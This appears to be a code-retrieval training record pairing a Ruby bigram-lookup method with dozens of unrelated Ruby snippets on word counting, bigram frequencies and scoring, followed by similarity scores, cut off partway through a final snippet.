"def word_sizes(text)\n word_size = Hash.new(0)\n text.split.map do |word|\n word.delete \"^A-Za-z\"\n word_size[word.size] += 1\n end\n word_size\nend",
"def word_count_total(text, unique: false)\n unique ? unique_words(text).length : normalize(text).length\nend",
"def full_bigram_counts\n {\n'TH' => 116997844,\n'HE' => 100689263,\n'IN' => 87674002,\n'ER' => 77134382,\n'AN' => 69775179,\n'RE' => 60923600,\n'ES' => 57070453,\n'ON' => 56915252,\n'ST' => 54018399,\n'NT' => 50701084,\n'EN' => 48991276,\n'AT' => 48274564,\n'ED' => 46647960,\n'ND' => 46194306,\n'TO' => 46115188,\n'OR' => 45725191,\n'EA' => 43329810,\n'TI' => 42888666,\n'AR' => 42353262,\n'TE' => 42295813,\n'NG' => 38567365,\n'AL' => 38211584,\n'IT' => 37938534,\n'AS' => 37773878,\n'IS' => 37349981,\n'HA' => 35971841,\n'ET' => 32872552,\n'SE' => 31532272,\n'OU' => 31112284,\n'OF' => 30540904,\n'LE' => 30383262,\n'SA' => 30080131,\n'VE' => 29320973,\n'RO' => 29230770,\n'RA' => 28645577,\n'RI' => 27634643,\n'HI' => 27495342,\n'NE' => 27331675,\n'ME' => 27237733,\n'DE' => 27029835,\n'CO' => 26737101,\n'TA' => 26147593,\n'EC' => 25775798,\n'SI' => 25758841,\n'LL' => 24636875,\n'SO' => 23903631,\n'NA' => 23547524,\n'LI' => 23291169,\n'LA' => 23178317,\n'EL' => 23092248,\n'MA' => 21828378,\n'DI' => 21673998,\n'IC' => 21468412,\n'RT' => 21456059,\n'NS' => 21306421,\n'RS' => 21237259,\n'IO' => 21210160,\n'OM' => 21066156,\n'CH' => 20132750,\n'OT' => 20088048,\n'CA' => 19930754,\n'CE' => 19803619,\n'HO' => 19729026,\n'BE' => 19468489,\n'TT' => 19367472,\n'FO' => 18923772,\n'TS' => 18922522,\n'SS' => 18915696,\n'NO' => 18894111,\n'EE' => 18497942,\n'EM' => 18145294,\n'AC' => 17904683,\n'IL' => 17877600,\n'DA' => 17584055,\n'NI' => 17452104,\n'UR' => 17341717,\n'WA' => 16838794,\n'SH' => 16773127,\n'EI' => 16026915,\n'AM' => 15975981,\n'TR' => 15821226,\n'DT' => 15759673,\n'US' => 15699353,\n'LO' => 15596310,\n'PE' => 15573318,\n'UN' => 15237699,\n'NC' => 15214623,\n'WI' => 15213018,\n'UT' => 15137169,\n'AD' => 14877234,\n'EW' => 14776406,\n'OW' => 14610429,\n'GE' => 14425023,\n'EP' => 14024377,\n'AI' => 13974919,\n'LY' => 13742031,\n'OL' => 13726491,\n'FT' => 13696078,\n'OS' => 13596265,\n'EO' => 13524186,\n'EF' => 13252227,\n'PR' => 13191182,\n'WE' => 13185116,\n'DO' => 13120322,\n'MO' => 12950768,\n'ID' => 12896787,\n'IE' => 12505546,\n'MI' => 12168944,\n'PA' => 12068709,\n'FI' => 11993833,\n'PO' => 11917535,\n'CT' => 11888752,\n'WH' => 11852909,\n'IR' => 11681353,\n'AY' => 11523416,\n'GA' => 11239788,\n'SC' => 10800636,\n'KE' => 10650670,\n'EV' => 10574011,\n'SP' => 10570626,\n'IM' => 10544422,\n'OP' => 10459455,\n'DS' => 10429887,\n'LD' => 10245579,\n'UL' => 10173468,\n'OO' => 10168856,\n'SU' => 10031005,\n'IA' => 10002012,\n'GH' => 9880399,\n'PL' => 9812226,\n'EB' => 9738798,\n'IG' => 9530574,\n'VI' => 9380037,\n'IV' => 9129232,\n'WO' => 9106647,\n'YO' => 9088497,\n'RD' => 9025637,\n'TW' => 8910254,\n'BA' => 8867461,\n'AG' => 8809266,\n'RY' => 8788539,\n'AB' => 8775582,\n'LS' => 8675452,\n'SW' => 8673234,\n'AP' => 8553911,\n'FE' => 8529289,\n'TU' => 8477495,\n'CI' => 8446084,\n'FA' => 8357929,\n'HT' => 8351551,\n'FR' => 8339376,\n'AV' => 8288885,\n'EG' => 8286463,\n'GO' => 8188708,\n'BO' => 8172395,\n'BU' => 8113271,\n'TY' => 8008918,\n'MP' => 7835172,\n'OC' => 7646952,\n'OD' => 7610214,\n'EH' => 7559141,\n'YS' => 7539621,\n'EY' => 7528342,\n'RM' => 7377989,\n'OV' => 7350014,\n'GT' => 7347990,\n'YA' => 7239548,\n'CK' => 7205091,\n'GI' => 7103140,\n'RN' => 7064635,\n'GR' => 6989963,\n'RC' => 6974063,\n'BL' => 6941044,\n'LT' => 6817273,\n'YT' => 6714151,\n'OA' => 6554221,\n'YE' => 6499305,\n'OB' => 6212512,\n'DB' => 6106719,\n'FF' => 6085519,\n'SF' => 6073995,\n'RR' => 5896212,\n'DU' => 5861311,\n'KI' => 5814357,\n'UC' => 5742385,\n'IF' => 5740414,\n'AF' => 5702567,\n'DR' => 5701879,\n'CL' => 5683204,\n'EX' => 5649363,\n'SM' => 5580755,\n'PI' => 5559210,\n'SB' => 5553684,\n'CR' => 5514347,\n'TL' => 5403137,\n'OI' => 5336616,\n'RU' => 5330557,\n'UP' => 5306948,\n'BY' => 5232074,\n'TC' => 5196817,\n'NN' => 5180899,\n'AK' => 5137311,\n'SL' => 4965012,\n'NF' => 4950333,\n'UE' => 4927837,\n'DW' => 4906814,\n'AU' => 4884168,\n'PP' => 4873393,\n'UG' => 4832325,\n'RL' => 4803246,\n'RG' => 4645938,\n'BR' => 4621080,\n'CU' => 4604045,\n'UA' => 4589997,\n'DH' => 4585765,\n'RK' => 4491400,\n'YI' => 4461214,\n'LU' => 4402940,\n'UM' => 4389720,\n'BI' => 4356462,\n'NY' => 4343290,\n'NW' => 4215967,\n'QU' => 4169424,\n'OG' => 4163126,\n'SN' => 4157990,\n'MB' => 4121764,\n'VA' => 4111375,\n'DF' => 4033878,\n'DD' => 4001275,\n'MS' => 3922855,\n'GS' => 3920675,\n'AW' => 3918960,\n'NH' => 3915410,\n'PU' => 3858148,\n'HR' => 3843001,\n'SD' => 3842250,\n'TB' => 3815459,\n'PT' => 3812475,\n'NM' => 3796928,\n'DC' => 3782481,\n'GU' => 3768430,\n'TM' => 3759861,\n'MU' => 3755834,\n'NU' => 3732602,\n'MM' => 3730508,\n'NL' => 3692985,\n'EU' => 3674130,\n'WN' => 3649615,\n'NB' => 3602692,\n'RP' => 3588188,\n'DM' => 3544905,\n'SR' => 3513808,\n'UD' => 3499535,\n'UI' => 3481482,\n'RF' => 3436232,\n'OK' => 3397570,\n'YW' => 3379064,\n'TF' => 3368452,\n'IP' => 3348621,\n'RW' => 3348005,\n'RB' => 3346212,\n'OH' => 3254659,\n'KS' => 3227333,\n'DP' => 3145043,\n'FU' => 3138900,\n'YC' => 3128053,\n'TP' => 3070427,\n'MT' => 3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def word_sizes(sentence)\n hash = Hash.new(0)\n sentence.split.each do |word|\n hash[word.size] += 1\n end\n hash\nend",
"def word_sizes(words)\n count_hash = Hash.new(0)\n words.split.each do |word|\n count_hash[word.size] += 1\n end\n p count_hash\nend",
"def word_sizes(sentence)\n words = Hash.new(0)\n sentence.split.each {|x| words[x.count(\"A-Za-z\")] += 1}\n words\nend",
"def grams\n @frequencies.keys\n end",
"def get_total_games_played\n\t\treturn games.size\n\tend",
"def number_of_chars\n text.to_s.number_of_chars\n end",
"def word_sizes(sentence)\n cleaned = sentence.gsub(/[^0-9a-z]/i, ' ')\n grouped = cleaned.split.group_by {|x| x.length }\n results = grouped.each {|x, i| grouped[x] = i.length}\n end",
"def get_total_games_played\n return games.size\n end",
"def word_sizes(string)\n string.split.map do |word|\n word.size\n end.tally\n \nend",
"def words_per_sentence\n @words.length.to_f / @sentences.length.to_f\n end",
"def numWords\n @words\n end",
"def number_letter_count(n)\n\ttotal = 0\n\tn.times do |i|\n\t\t# puts wordify(i+1) # uncomment if you want to print out the numbers\n\t\ttotal += word_number_length(i+1)\n\tend\n\treturn total\nend",
"def word_sizes(string)\n string.split.map { |word| word.size }.tally\nend",
"def word_sizes(sentence)\n sentence.split.each_with_object(Hash.new(0)) { |word, obj| obj[word.size] += 1 } \nend",
"def number_of_tokens\r\n return MONOPOLY_GAME[:tokens].count\r\nend",
"def get_raw_counts phrase, ngram_model=0, separator=\" \"\n ngram_model_inferred = ngram_model==0 ? phrase.split(separator).count : ngram_model\n return @ngram_counts[ngram_model_inferred][phrase]\n end",
"def length\n @tokens.length\n end",
"def how_many\n return @@total_samurais\n end",
"def total_pages\n\t\t\t\treturn 0 if @total_results == 0\n\t\t\t\t(@total_results.to_f / BATCH_SIZE).ceil\n\t\t\tend",
"def total_rounds\n matches_per_round = users.count / 2\n total_matches = (users.count - 1) * matches_per_round\n total_rounds = total_matches / matches_per_round\n\n total_rounds\n end",
"def total_score\n total_score = 0\n plays.each do |word|\n total_score += Scrabble::Scoring.score(word)\n end\n return total_score\n end",
"def count_guess \r\n\t\t@num_guess = @secret_word.length \r\n\t\t@num_guess.times do \r\n\t\t\t@word_length_array << \"_\"\r\n\t\tend \r\n\t\tp @word_length_array\r\n\tend",
"def total_review_character_count\n review_character_counts.inject(:+)\n end",
"def word_sizes(str)\n str.split.map { |element| element.size }.tally\nend",
"def total_score\n return @plays.reduce(0) { |memo, word| memo + Scrabble::Scoring.score(word) }\n end",
"def total_included_words\n included_paragraphs_joined.split(' ').size\n end",
"def digit_count(titles)\n Math.log10(titles.size).to_i + 1\n end",
"def words_count\n get_at_words_count + \n get_ata_words_count + \n get_noun_words_count + \n get_adjective_words_count\n end",
"def total\n @messages.size\n end",
"def total_count\n @_total_count || @_original_array.length\n end",
"def nouns\n i = 0\n @synsets.each do |key, values|\n i += values.length\n end\n i\n end",
"def num_unique_words\n @frequencies.keys.length\n end",
"def total_num_team_reviews\n team_review_counts.inject(:+)\n end",
"def get_adjective_words_count\n @redis.llen(\"store:adjectives\").to_i\n end",
"def number_of_tokens\n result = MONOPOLY_GAME[:tokens].count\n\nend",
"def NumMessages\n Builtins.size(@messages)\n end",
"def total_count #:nodoc:\n total == 1 && !@group.nil? && @group['matches'] > 1 ? @group['matches'] : total\n end",
"def process\n tokenize(text).each do |word|\n token = TfIdfSimilarity::Token.new word\n if token.valid?\n @term_counts[token.lowercase_filter.classic_filter.to_s] += 1\n end\n end\n @size = term_counts.values.reduce(:+)\n end",
"def nonadword_count_total(page)\n\t\tnonadword_urls(page).length\n\tend",
"def count_sentences\n self.split(/[.?!] /).count\n end",
"def number_of_characters\n @text.length\n end",
"def num_words_current\n @active_list.size\n end",
"def total_count\n @all.size\n end",
"def count\n each.size\n end"
] | [
"0.74235284",
"0.6953551",
"0.6816287",
"0.67369366",
"0.6519049",
"0.6369594",
"0.6341712",
"0.6339302",
"0.63020474",
"0.62844026",
"0.6257695",
"0.62269944",
"0.62049586",
"0.62049586",
"0.61644775",
"0.6141836",
"0.61363196",
"0.613448",
"0.6115112",
"0.61092526",
"0.6082771",
"0.6039322",
"0.60027415",
"0.60024273",
"0.5997999",
"0.59970737",
"0.5989174",
"0.5989174",
"0.59691185",
"0.5968823",
"0.59273285",
"0.5926488",
"0.59087324",
"0.59087324",
"0.589645",
"0.5892114",
"0.58898544",
"0.5886808",
"0.58812994",
"0.5865959",
"0.58637565",
"0.58532894",
"0.5841185",
"0.5826518",
"0.58051115",
"0.57972765",
"0.5789224",
"0.57756364",
"0.5773864",
"0.576874",
"0.5763513",
"0.5759799",
"0.5756394",
"0.5752119",
"0.5746703",
"0.5743082",
"0.5740471",
"0.5738745",
"0.57209754",
"0.5709864",
"0.57049215",
"0.5700713",
"0.56864905",
"0.5685794",
"0.5676849",
"0.5665305",
"0.5662922",
"0.56620795",
"0.56537986",
"0.5649441",
"0.5643879",
"0.56360567",
"0.56311566",
"0.56211215",
"0.5620876",
"0.5618085",
"0.5615476",
"0.56139976",
"0.56030154",
"0.5590893",
"0.55880386",
"0.55819273",
"0.5581312",
"0.55785143",
"0.5577249",
"0.55642396",
"0.5561957",
"0.5558195",
"0.55568546",
"0.55563295",
"0.555255",
"0.5552157",
"0.5549392",
"0.55471516",
"0.55443305",
"0.55415785",
"0.55301297",
"0.5522936",
"0.5521773",
"0.55183935",
"0.5517697"
] | 0.0 | -1 |
Get a list of second words of bigrams matching the given first word. | def matching_bigrams(word1)
list = @index[word1]
list.map{ |word2| @table[[word1,word2]] }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_bigrams(string)\n s = string.downcase\n v = []\n (s.length-1).times{ |i|\n v[i] = s[i...i+2]\n }\n return v\n end",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def find_ocurrences(text, first, second)\n text = text.split(' ')\n \n word_output = []\n \n text.each_with_index do |word, index|\n next if index == 0 || index == 1\n \n word_output << word if text[index - 1] == second && text[index - 2] == first\n end\n \n word_output\nend",
"def next_words_for(word) \n if word.nil? or word.empty?\n generator_names \n else\n name_of_last_generator_inverse = word[-1].swapcase\n generator_names.find_all{|name| name != name_of_last_generator_inverse }.map{|name| word + name }\n end\n end",
"def search_for (word)\n\n chars = word.split(\"\")\n all_words = chars.permutation(chars.size).map{|_chars|\n _chars.join \"\"\n }\n\n anagrams = []\n all_words.each do |w|\n anagrams.push w if @word_list[w]\n end\n\n return anagrams\n end",
"def word_unscrambler(str, words)\n str = str.split('').sort.join('')\n possible = []\n words.map do |word|\n sort_word = word.split('').sort.join('')\n possible << word if word_c == str\n end\n return possible\nend",
"def best_match(given_word)\n words = (@word_list.is_a? Array) ? @word_list : @word_list.keys\n\n word_bigrams = bigramate(given_word)\n word_hash = words.map do |key|\n [key, bigram_compare(word_bigrams, bigramate(key))]\n end\n word_hash = Hash[word_hash]\n\n # Weight by word usage, if logical\n word_hash = apply_usage_weights(word_hash) if @word_list.is_a? Hash\n\n word_hash.max_by { |_key, value| value }.first\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def extract_names(content)\n names = []\n \n # Split content into words.\n words = content.split(/[^-_a-z0-9]+/i).select {|v| v.index(/^[-a-z]+$/i)}\n \n # Loop over each bigram and check if the words are title cased and if at\n # least one of the words is a first or last name.\n words.each_with_index do |first_name, index|\n surname = full_surname = words[index+1] || ''\n \n # Skip to the next word if we have a couple of the next words.\n if ['van', 'von'].index(surname)\n surname = words[index+2] || ''\n full_surname = \"#{full_surname} #{surname}\"\n end\n \n # Only look at two words that are titlecase and neither one is a stopword.\n next if !first_name.titlecase? || !surname.titlecase?\n next if !stopwords.index(first_name.upcase).nil? || !stopwords.index(surname.upcase).nil?\n \n # Check if either the first name or last name is a recognized common name.\n if Matlock::Data.first_name?(first_name) || Matlock::Data.surname?(surname)\n full_name = \"#{first_name} #{full_surname}\"\n names << full_name if names.index(full_name).nil?\n end\n end\n \n return names\n end",
"def find_solution(first_word, second_word)\n\tif first_word.length != second_word.length\n\t\treturn \"bad input, words must be the same length\"\n\tend\n\n\tcurrent_word = first_word\n\t$chain << first_word\n\n\twhile true\n\t\tpossible = words_1_letter_diff(current_word)\n\t\tpossible = possible - $seen\n\t\tif possible.include?(second_word)\n\t\t\treturn $chain << second_word\n\t\tend\n\n\t\tif possible != []\n\t\t\t$chain << possible.last\n\t\t\t$seen << possible.last\n\t\t\tcurrent_word = $chain.last\n\t\telse\n\t\t\tbacktrack()\n\t\t\tcurrent_word = $chain.last\n\t\tend\n\n\t\tif $chain == []\n\t\t\treturn \"impossible\"\n\t\tend\n\n\t\tif $chain.last == second_word\n\t\t\treturn $chain\n\t\tend\n\tend\nend",
"def every_possible_pairing_of_word(arr)\n i1 = arr\n i2 = []\n i1.combination(2).to_a\nend",
"def each_word_pair\n words.each_cons(2) { |array| yield(array[0],array[1]) }\n end",
"def print_two_words\n \"#{@array_to_split[0]} and #{@lastword}\"\n end",
"def alternate_words(s)\nwords = s.gsub(/[!@$%^&*()-=_+:;,.<>?\\|]/ , ' ').split\n#removing all symbols and spliting the words. Setting variable to words\nfirst = words.sort\n#sorting the words\nprint first[0..2]\n#print the first 0 to 2 indexes\n\n\nend",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def num_matching(one_bigrams, two_bigrams, acc = 0)\n return acc if one_bigrams.empty? || two_bigrams.empty?\n\n one_two = one_bigrams.index(two_bigrams[0])\n two_one = two_bigrams.index(one_bigrams[0])\n\n if one_two.nil? && two_one.nil?\n num_matching(one_bigrams.drop(1), two_bigrams.drop(1), acc)\n else\n # If one is nil, it is set to the other\n two_one ||= one_two\n one_two ||= two_one\n\n if one_two < two_one\n num_matching(one_bigrams.drop(one_two + 1),\n two_bigrams.drop(1), acc + 1)\n else\n num_matching(one_bigrams.drop(1),\n two_bigrams.drop(two_one + 1), acc + 1)\n end\n end\n end",
"def match(possible_anagrams)\nresult = []\nsplitted_word = @word.downcase.split(\"\").sort\n\npossible_anagrams.each do |element|\nif splitted_word == element.downcase.split(\"\").sort\n result << element\nend \nend\nresult\nend",
"def mcw(word)\n\tif $bigrams.has_key? word\n\t\tmax = 0\n\t\tkeys = []\n\t\t$bigrams[word].each do |key, count|\n\t\t\tif count > max\n\t\t\t\tkeys = [key]\n\t\t\t\tmax = count\n\t\t\telsif count == max\n\t\t\t\tkeys << key\n\t\t\tend\n\t\tend\n\n\t\tif keys.length > 1\n\t\t\treturn keys[Random.rand(keys.length)]\n\t\telse\n\t\t\treturn keys[0]\n\t\tend\n\tend\n\treturn \"\"\nend",
"def word_unscrambler(str, words)\n str_letters = str.split(\"\").sort\n\n res = []\n words.each do |word|\n word_letters = word.split(\"\").sort\n res << word if str_letters == word_letters\n end\n\n res\nend",
"def subwords(word, dictionary)\r\n res = []\r\n substrings(word).each do |ele|\r\n res << ele if dictionary.include?(ele)\r\n end\r\n res\r\nend",
"def combine_anagrams(words)\n final = []\n first_word = ''\n b = ''\n words.each_with_index do |word_a, i|\n first_word = word_a.downcase.split('').sort\n final << [word_a]\n words.each_with_index do |word_b, j|\n if word_a == word_b\n else\n if first_word == word_b.downcase.split('').sort\n final[i] << word_b\n words.delete(word_b)\n else\n end\n end\n end\n end\n return final\nend",
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def one_off_words(str,word_list)\n result = []\n better_list = word_list.select{|word| word.size == str.size}\n better_list.each do |word|\n i = 0\n count = 0\n while i < word.size\n count += 1 if word[i] == str[i]\n i += 1\n end\n result << word if word.size - count == 1\n end\n result\nend",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif 